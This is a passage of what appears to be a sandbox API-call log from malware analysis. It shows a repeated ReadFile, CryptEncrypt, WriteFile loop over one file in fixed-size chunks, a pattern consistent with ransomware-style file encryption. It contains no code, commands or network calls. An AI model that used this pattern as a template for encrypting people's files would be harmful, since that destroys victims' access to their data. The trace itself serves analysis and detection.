nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.967] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.968] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.968] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.968] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.968] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.968] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.968] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.968] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.968] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.969] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.969] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.969] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.969] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.969] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.969] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.970] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.970] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.970] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.970] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.970] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.970] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.970] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.970] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.971] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.971] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.971] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.971] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.971] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.971] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.972] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.972] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.972] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.972] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.972] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.973] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.973] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.973] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.973] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, 